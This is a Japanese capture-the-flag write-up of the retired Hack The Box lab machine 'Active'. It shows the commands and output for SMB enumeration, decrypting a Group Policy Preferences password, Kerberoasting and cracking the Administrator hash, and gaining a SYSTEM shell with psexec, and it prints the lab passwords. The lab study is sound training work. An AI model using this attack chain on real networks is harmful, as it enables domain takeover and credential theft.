初めに
どうも、クソ雑魚のなんちゃてエンジニアです。
本記事は Hack The Box(以下リンク参照) の「Active」にチャレンジした際の WriteUp になります。
※以前までのツールの使い方など詳細を書いたものではないのでご了承ください。
※悪用するのはやめてください。あくまで社会への貢献のためにこれらの技術を使用してください。法に触れるので。
Discovery
ポートスキャン
今回はRustScanで高速スキャンしてみた。
┌──(root㉿kali)-[~/work]
└─# rustscan -a 10.10.10.100 --top --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.10.100:53
Open 10.10.10.100:88
Open 10.10.10.100:135
Open 10.10.10.100:139
Open 10.10.10.100:389
Open 10.10.10.100:445
Open 10.10.10.100:464
Open 10.10.10.100:593
Open 10.10.10.100:636
Open 10.10.10.100:5722
Open 10.10.10.100:9389
Open 10.10.10.100:49152
Open 10.10.10.100:49153
Open 10.10.10.100:49155
Open 10.10.10.100:49154
Open 10.10.10.100:49157
Open 10.10.10.100:49158
Open 10.10.10.100:49165
Open 10.10.10.100:49170
Open 10.10.10.100:49171
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 05:50 EDT
Initiating Ping Scan at 05:50
Scanning 10.10.10.100 [4 ports]
Completed Ping Scan at 05:50, 0.27s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:50
Completed Parallel DNS resolution of 1 host. at 05:50, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 05:50
Scanning 10.10.10.100 [20 ports]
Discovered open port 445/tcp on 10.10.10.100
Discovered open port 139/tcp on 10.10.10.100
Discovered open port 636/tcp on 10.10.10.100
Discovered open port 53/tcp on 10.10.10.100
Discovered open port 135/tcp on 10.10.10.100
Discovered open port 49154/tcp on 10.10.10.100
Discovered open port 49158/tcp on 10.10.10.100
Discovered open port 5722/tcp on 10.10.10.100
Discovered open port 49155/tcp on 10.10.10.100
Discovered open port 49170/tcp on 10.10.10.100
Discovered open port 49165/tcp on 10.10.10.100
Discovered open port 88/tcp on 10.10.10.100
Discovered open port 389/tcp on 10.10.10.100
Discovered open port 9389/tcp on 10.10.10.100
Discovered open port 464/tcp on 10.10.10.100
Discovered open port 593/tcp on 10.10.10.100
Discovered open port 49153/tcp on 10.10.10.100
Discovered open port 49157/tcp on 10.10.10.100
Discovered open port 49152/tcp on 10.10.10.100
Discovered open port 49171/tcp on 10.10.10.100
Completed SYN Stealth Scan at 05:50, 0.41s elapsed (20 total ports)
Nmap scan report for 10.10.10.100
Host is up, received echo-reply ttl 127 (0.20s latency).
Scanned at 2023-07-27 05:50:19 EDT for 0s
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
5722/tcp open msdfsr syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
49152/tcp open unknown syn-ack ttl 127
49153/tcp open unknown syn-ack ttl 127
49154/tcp open unknown syn-ack ttl 127
49155/tcp open unknown syn-ack ttl 127
49157/tcp open unknown syn-ack ttl 127
49158/tcp open unknown syn-ack ttl 127
49165/tcp open unknown syn-ack ttl 127
49170/tcp open unknown syn-ack ttl 127
49171/tcp open unknown syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.77 seconds
Raw packets sent: 24 (1.032KB) | Rcvd: 21 (908B)
Windows環境ぽい。色々とPortが開いているので、情報を収集していこうと思う。
ldapのスクリプトも回してさっとAD環境の情報を取得する。
┌──(root㉿kali)-[~/work]
└─# nmap -p 389 -n -Pn 10.10.10.100 --script ldap-rootdse
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 05:51 EDT
Nmap scan report for 10.10.10.100
Host is up (0.18s latency).
PORT STATE SERVICE
389/tcp open ldap
| ldap-rootdse:
| LDAP Results
| <ROOT>
| currentTime: 20230727095104.0Z
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=active,DC=htb
| dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=active,DC=htb
| namingContexts: DC=active,DC=htb
| namingContexts: CN=Configuration,DC=active,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=active,DC=htb
| namingContexts: DC=DomainDnsZones,DC=active,DC=htb
| namingContexts: DC=ForestDnsZones,DC=active,DC=htb
| defaultNamingContext: DC=active,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=active,DC=htb
| configurationNamingContext: CN=Configuration,DC=active,DC=htb
| rootDomainNamingContext: DC=active,DC=htb
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| highestCommittedUSN: 114787
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| dnsHostName: DC.active.htb
| ldapServiceName: active.htb:dc$@ACTIVE.HTB
| serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=active,DC=htb
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| isSynchronized: TRUE
| isGlobalCatalogReady: TRUE
| domainFunctionality: 4
| forestFunctionality: 4
|_ domainControllerFunctionality: 4
Service Info: Host: DC; OS: Windows 2008 R2
Nmap done: 1 IP address (1 host up) scanned in 1.13 seconds
dnsHostName: DC.active.htb
からドメインの情報は分かった。
Collection
rpcclient
RPCで列挙が出来るか試す。
┌──(root㉿kali)-[~/work]
└─# rpcclient 10.10.10.100 -U '' -N
rpcclient $> enumdomains
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> lsaquery
do_cmd: Could not initialise lsarpc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> querydominfo
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomusers
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $>
何もなかった。
nmap-vuln
やけくそでvulnスクリプト回してみる。
┌──(root㉿kali)-[~/work]
└─# nmap -Pn 10.10.10.100 --script vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 05:53 EDT
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.21s latency).
Not shown: 982 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49165/tcp open unknown
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
Nmap done: 1 IP address (1 host up) scanned in 413.14 seconds
何の成果も!!上げられませんでした!!!
SMB
Port445があいているのでここら辺を探索してみる。
nmapのスクリプトを回してみる。まずは基本情報の列挙だ。
┌──(root㉿kali)-[~/work]
└─# nmap -p 445 -n -Pn 10.10.10.100 --script smb-protocols,smb-os-discovery,smb-enum-shares,smb-enum-users,smb-enum-services
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 05:53 EDT
Nmap scan report for 10.10.10.100
Host is up (0.19s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)
Host script results:
| smb-protocols:
| dialects:
| 2:0:2
|_ 2:1:0
Nmap done: 1 IP address (1 host up) scanned in 12.72 seconds
何も使えそうな情報は出てこなかった。
んじゃ実際に入っるか見てみる。
┌──(root㉿kali)-[~/work]
└─# smbclient -N -L \\\\10.10.10.100
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
ほう、共有階層に面白そうなのがあるね。
Usersに突っ込めるかな?
┌──(root㉿kali)-[~/work]
└─# smbclient -N \\\\10.10.10.100\\Users
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
ダメでした。んじゃReplication
の方で!
┌──(root㉿kali)-[~/work]
└─# smbclient -N \\\\10.10.10.100\\Replication
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
5217023 blocks of size 4096. 278872 blocks available
ああ、これっぽいな最初の調査対象。
これをフォルダごと持ってきます。
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.2 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (3.5 KiloBytes/sec) (average 0.9 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (0.7 KiloBytes/sec) (average 0.9 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (1.4 KiloBytes/sec) (average 1.0 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (4.7 KiloBytes/sec) (average 1.5 KiloBytes/sec)
smb: \>
よし、調査を開始します。
Credential Access
GPP
引っ張ってきた階層を色々と調査していると色々とグループポリシーのようなファイルが散見される。
その中で以下のファイルを発見した。
┌──(root㉿kali)-[~/…/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups]
└─# cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
ほう、ユーザ名とあとGPPのクレデンシャルが見えるな。AESで暗号化されている奴だったような気がする。
調べてみると復号化できる便利なコマンドがあるので試してみる。
上手く復元できたようだ。ここら辺の話は以下の記事を参考にしてほしい。
んじゃこれを使ってアクセスしてみる。
shell
いつものごとくwinrmでアクセスしてみる。
┌──(root㉿kali)-[~/work]
└─# evil-winrm -i 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type Errno::ECONNREFUSED happened, message is Connection refused - Connection refused - connect(2) for "10.10.10.100" port 5985 (10.10.10.100:5985)
Error: Exiting with code 1
ん??ダメと言われる。
Portが開いてないからか?んじゃSmbexecで...こいつもダメだった。
もしかして見れる階層が限られている??smbmapで確認する。
┌──(root㉿kali)-[~/work]
└─# smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
[+] IP: 10.10.10.100:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
そうっぽい。Users階層は入れそうなので、この階層へ入ってみる。
┌──(root㉿kali)-[~/work]
└─# smbclient -U svc_tgs \\\\10.10.10.100\\Users
Password for [WORKGROUP\svc_tgs]:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
5217023 blocks of size 4096. 278856 blocks available
smb: \>
入れてますね。んじゃ探索。
smb: \>
smb: \> cd SVC_TGS
smb: \SVC_TGS\> dir
. D 0 Sat Jul 21 11:16:32 2018
.. D 0 Sat Jul 21 11:16:32 2018
Contacts D 0 Sat Jul 21 11:14:11 2018
Desktop D 0 Sat Jul 21 11:14:42 2018
Downloads D 0 Sat Jul 21 11:14:23 2018
Favorites D 0 Sat Jul 21 11:14:44 2018
Links D 0 Sat Jul 21 11:14:57 2018
My Documents D 0 Sat Jul 21 11:15:03 2018
My Music D 0 Sat Jul 21 11:15:32 2018
My Pictures D 0 Sat Jul 21 11:15:43 2018
My Videos D 0 Sat Jul 21 11:15:53 2018
Saved Games D 0 Sat Jul 21 11:16:12 2018
Searches D 0 Sat Jul 21 11:16:24 2018
5217023 blocks of size 4096. 278856 blocks available
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> dir
. D 0 Sat Jul 21 11:14:42 2018
.. D 0 Sat Jul 21 11:14:42 2018
user.txt AR 34 Thu Jul 27 00:35:21 2023
5217023 blocks of size 4096. 278856 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \SVC_TGS\Desktop\>
Userゲットできました!まさか完全なShellをゲットできないとは...Privesc苦労するぞこれ...
Privilege Escalation
RustHound
遠隔で列挙できるToolで試してみる。
Rusthoundさんお願いします!!!
┌──(root㉿kali)-[/opt/RustHound]
└─# docker run -v /opt/RustHound/work:/tmp/htb rusthound -d active.htb -i 10.10.10.100 -u 'SVC_TGS@active.htb' -p 'GPPstillStandingStrong2k18' -o '/tmp/htb' -z
---------------------------------------------------
Initializing RustHound at 10:54:41 on 07/27/23
Powered by g0h4n from OpenCyber
---------------------------------------------------
[2023-07-27T10:54:41Z INFO rusthound] Verbosity level: Info
[2023-07-27T10:54:41Z INFO rusthound::ldap] Connected to ACTIVE.HTB Active Directory!
[2023-07-27T10:54:41Z INFO rusthound::ldap] Starting data collection...
[2023-07-27T10:54:43Z INFO rusthound::ldap] All data collected for NamingContext DC=active,DC=htb
[2023-07-27T10:54:43Z INFO rusthound::json::parser] Starting the LDAP objects parsing...
[2023-07-27T10:54:43Z INFO rusthound::json::parser::bh_41] MachineAccountQuota: 10
[2023-07-27T10:54:43Z INFO rusthound::json::parser] Parsing LDAP objects finished!
[2023-07-27T10:54:43Z INFO rusthound::json::checker] Starting checker to replace some values...
[2023-07-27T10:54:43Z INFO rusthound::json::checker] Checking and replacing some values finished!
[2023-07-27T10:54:43Z INFO rusthound::json::maker] 5 users parsed!
[2023-07-27T10:54:43Z INFO rusthound::json::maker] 49 groups parsed!
[2023-07-27T10:54:43Z INFO rusthound::json::maker] 1 computers parsed!
[2023-07-27T10:54:43Z INFO rusthound::json::maker] 1 ous parsed!
[2023-07-27T10:54:43Z INFO rusthound::json::maker] 1 domains parsed!
[2023-07-27T10:54:43Z INFO rusthound::json::maker] 2 gpos parsed!
[2023-07-27T10:54:43Z INFO rusthound::json::maker] 21 containers parsed!
RustHound Enumeration Completed at 10:54:43 on 07/27/23! Happy Graphing!
[2023-07-27T10:54:43Z INFO rusthound::json::maker] /tmp/htb/20230727105443_active-htb_rusthound.zip created!
よし!とりあえずldap経由での列挙は出来そうだ!!
続いてneo4j
とbloodhound
を起動します。
┌──(root㉿kali)-[~/work]
└─# neo4j console
┌──(root㉿kali)-[~]
└─# bloodhound
出来たZIPを投入して確認します。
いいPathはない。
だが調査を続けると気になる記述があった。
管理者のSPNが提供されてそう。これはTGSから払い出されるSTからハッシュ抽出してKerberoastingする流れなのでしょうか??
SVC_TGS目線でも確認する。
GenericAllのPermissionなので余裕。Kerberoastingしろって言われてるしね!
ああ、だからこのユーザ名なのねw
Kerberoasting
ImpacketのGetUserSPNsを使ってSTを取得する。その際にハッシュも抽出しておく。
┌──(root㉿kali)-[~/work]
└─# impacket-GetUserSPNs -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request -save -outputfile tgs.hash
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2023-07-27 00:35:28.078171
抽出したものを確認する。
┌──(root㉿kali)-[~/work]
└─# ls -lta
total 138784
drwxr-xr-x 3 root root 4096 Jul 27 07:23 .
-rw-r--r-- 1 root root 1190 Jul 27 07:23 Administrator.ccache
-rw-r--r-- 1 root root 1878 Jul 27 07:23 tgs.hash
drwx------ 16 root root 4096 Jul 27 06:55 ..
-rw-r--r-- 1 root root 34 Jul 27 06:19 user.txt
-rw-r--r-- 1 root root 87 Jul 27 06:11 hash
-rw-r--r-- 1 root root 139921507 Jul 27 06:11 rockyou.txt
drwxr-xr-x 5 root root 4096 Jul 27 06:01 active.htb
┌──(root㉿kali)-[~/work]
└─# cat tgs.hash
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$faefbe2975e30ebfde3caf0f771ec678$fa8bbaaff8c8454a6b6af0b8f12a39d58afa68fcfaae5810330e4f1247eb92cff73d3645747bc6d91068f2bd44c05d3eeb17ae82a8a07e7cf6bf896b64429595601518e0ab4dc1dfc9069f564f18bc72cae6e93e27201ef8cad7e6c41df9fee42d71f07c15bd979fb43c855300c6b82c5888641e04326feee6b13267c9c7e27062cd06235310f858f274a841cc791ef745236eb74d47adb83e5b38fd9862ca88671c4b2d1443ca6f1175228c3321065ea650f051cc1ff1d152f0a91a62482337b2deb9c383b2b6c739ac69baa4fe4e661f78ddb35be43b25ea715a6ed91f44ad1e0ec30156c7b0d73390f1e937a0ae0e1c1e12a68444bedfa5c9d253d640645405dbca840e2e2a027121b948befea758f1ad8735c0228460c7a57daf89f95fe485ce269b306dc5555bc44ff2ac071ed0790d49ac56ca13f948be4fa043ec66874197a975daea5a0136f6cff86a358d2d1afc73129b50dfef02a371373eb0c4d4d41e5f9e121b968d7c6d88907dac614c5166f8d3ede2bc0f6890a9a21d97f9af6adc203d54f58db169c1d5e7e4e1a5cdda60534edd298a0994c568eca55e1928bcb604e6a78df9680451b60610988442692f2c3ff2a61e87d9876c5d68a9f837202f7c30c3b2a9508fe8feb4f28c4a4d2bcb1c8905356e6abbf0657a26123da103b21f94dad2351f652d1ed98df688d63912b8ea2f6d92b6111e2a81b9ecdd95f40482ea04bc11cda86eec3e0e7510ba4fc81626a3bcbe1f6c7b2ee54ae9a453e94548fd540ba846b67eaf1fe919fae5f6c1211ce13166ea5bb603a1a8360f1d6ee09b5e1f0b523305719b3de44526bb8fd07a377c45c750887f3a26b54d7364828517608be818b6c9d93e751dee73f000264c2c4890c710c5da8fb2d1730443211a021c28b51d54a6efca00387c59720838bdc41eacb1cc31a6930fc278d29ec3b6b7843719e08fd67c12bd6d18efcc1ccf40ee149daeefeacd8980255e7c30f5be87d05a99ea30e3bb7427131055d5ed26842d21c4dc63f4ea7639ad6cfb4d9def95f24426d93f2048da4b6a51b11210f946b217a2f47ea701cfa7fa818bdd7523f00212b018d083449ad7b47ad82bcc93e4af3ecb3d79bba60d974f1d011b7c36cce74a8b64849ba573a590596e3090fbd35ec7d591d555e579c4a02098439a65139b2403ba15fdaf339eabea51550381cd05a6e83cf89ca4a17b5a2accfdd3da5b9467befaa04b2b78c8ef26102e11bfb390a21a8339a486
このハッシュをJohnさんで解析する。
頼みます!!!
┌──(root㉿kali)-[~/work]
└─# john --wordlist=./rockyou.txt tgs.hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:06 DONE (2023-07-27 07:24) 0.1443g/s 1520Kp/s 1520Kc/s 1520KC/s Tiffani1432..Tiago_18
Use the "--show" option to display all of the cracked passwords reliably
きました!勝ちです!!!
一応アクセスできるか確認してみる。
┌──(root㉿kali)-[~/work]
└─# smbmap -H 10.10.10.100 -d active.htb -u administrator -p Ticketmaster1968
[+] IP: 10.10.10.100:445 Name: active.htb
[\] Work[!] Unable to remove test directory at \\10.10.10.100\SYSVOL\CRZDFMTGXJ, please remove manually
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
C$ READ, WRITE Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ, WRITE Logon server share
Replication READ ONLY
SYSVOL READ, WRITE Logon server share
Users READ ONLY
ADMIN$のこのPermissionならsmbexecやらpsexecでアクセスできそう!
試してみます。
┌──(root㉿kali)-[~/work]
└─# impacket-psexec active.htb/Administrator:Ticketmaster1968@10.10.10.100
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file pAQhNxnp.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service SwHh on 10.10.10.100.....
[*] Starting service SwHh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32> whoami
nt authority\system
Administrator権限を奪取できました!!!
まとめ
今回はFreeになっていたRetiredマシンを攻略しました。Windowsマシンは貴重なので助かります。
smbでの不完全シェルを強制される辛いBoxでした。その際の権限上昇のための列挙方法を用意しておかないとなと思いました。smbシェルはやりにくい。
今回もセキュリティエンジニアの皆さんの助けになればなと思います。